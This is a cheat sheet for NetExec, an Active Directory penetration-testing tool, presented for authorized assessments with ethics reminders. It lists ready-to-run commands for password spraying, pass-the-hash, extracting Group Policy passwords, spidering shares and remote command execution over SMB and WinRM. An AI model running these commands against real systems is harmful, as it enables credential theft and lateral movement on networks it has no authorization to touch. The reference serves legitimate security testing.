NetExec Cheat Sheet
Modern CrackMapExec successor for AD protocol abuse and automation.
Overview
NetExec (nxc) continues the CrackMapExec model for SMB, WinRM, LDAP, MSSQL, RDP, and more with active development. Used for credential checking, enumeration, and lateral movement in authorized internal assessments. Ethics: identical constraints as CME—lockouts, DCSync modules, and execution are high impact; stay in scope.
Install
pipx install git+https://github.com/Pennyw0rth/NetExecor: pipx install netexec
nxc --versionEssential commands
nxc smb 10.10.10.0/24 -u user -p 'Password1!'nxc smb hosts.txt -u admin -H 31d6cfe0d16ae931b73c59d7e0c089c0nxc winrm 10.10.10.10 -u administrator -p passnxc ldap 10.10.10.1 -u user@corp.local -p pass -d corp.local --usersCommon workflows
Auth check / spray —
nxc smb 10.10.10.0/24 -u users.txt -p 'Password1!' --no-bruteforcenxc smb dc01.corp.local -u j.doe -p 'Winter2026!' -d corp.localShares and sensitive files —
nxc smb 10.10.10.5 -u user -p pass --sharesnxc smb 10.10.10.5 -u user -p pass -M gpp_passwordnxc smb 10.10.10.5 -u user -p pass -M spider_plus -o OUTPUT_FOLDER=/tmp/spiderExecution —
nxc smb 10.10.10.10 -u administrator -p pass -x 'hostname'nxc smb 10.10.10.10 -u admin -p pass -X 'Get-Process' --exec-method smbexecLDAP —
nxc ldap 10.10.10.1 -u user -p pass -d corp.local --trusted-for-delegationnxc ldap 10.10.10.1 -u user -p pass -M adcsWinRM / RDP —
nxc winrm 10.10.10.10 -u administrator -p pass -x 'whoami'nxc rdp 10.10.10.10 -u user -p passFlags reference
-u / -p | Credentials |
|---|---|
-H | NTLM hash |
-d | Domain |
-M | Module |
-o | Module options |
-x / -X | CMD / PowerShell |
--generate-hosts-file | Targets from scan |
--log | Log path |
Tips
- Ethics: prefer targeted host lists over /24 sprays on production; document valid accounts immediately.
- nxc -L lists modules; read module wiki before running invasive plugins.
- Migrate from cme to nxc command-for-command in new engagements.
- Combine with impacket and bloodhound for full AD kill chains.